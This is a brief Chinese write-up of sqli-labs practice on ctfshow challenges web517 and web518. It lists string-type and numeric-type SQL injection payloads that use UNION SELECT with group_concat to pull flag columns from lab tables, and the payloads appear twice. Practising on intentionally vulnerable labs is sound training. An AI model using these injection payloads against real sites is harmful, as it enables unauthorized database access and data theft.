sqli-labs刷题
web517
(字符型sql注入)
payload:?id=0' union select 1,2,(select group_concat(flag)) from ctfshow.flag--+
web518
(数字型sql注入)
payload:?id=-1 union select 1,2,(select group_concat(flagac)) from ctfshow.flagaa
“有人见星辰,有人见尘埃”
(字符型sql注入)
payload:?id=0' union select 1,2,(select group_concat(flag)) from ctfshow.flag--+
(数字型sql注入)
payload:?id=-1 union select 1,2,(select group_concat(flagac)) from ctfshow.flagaa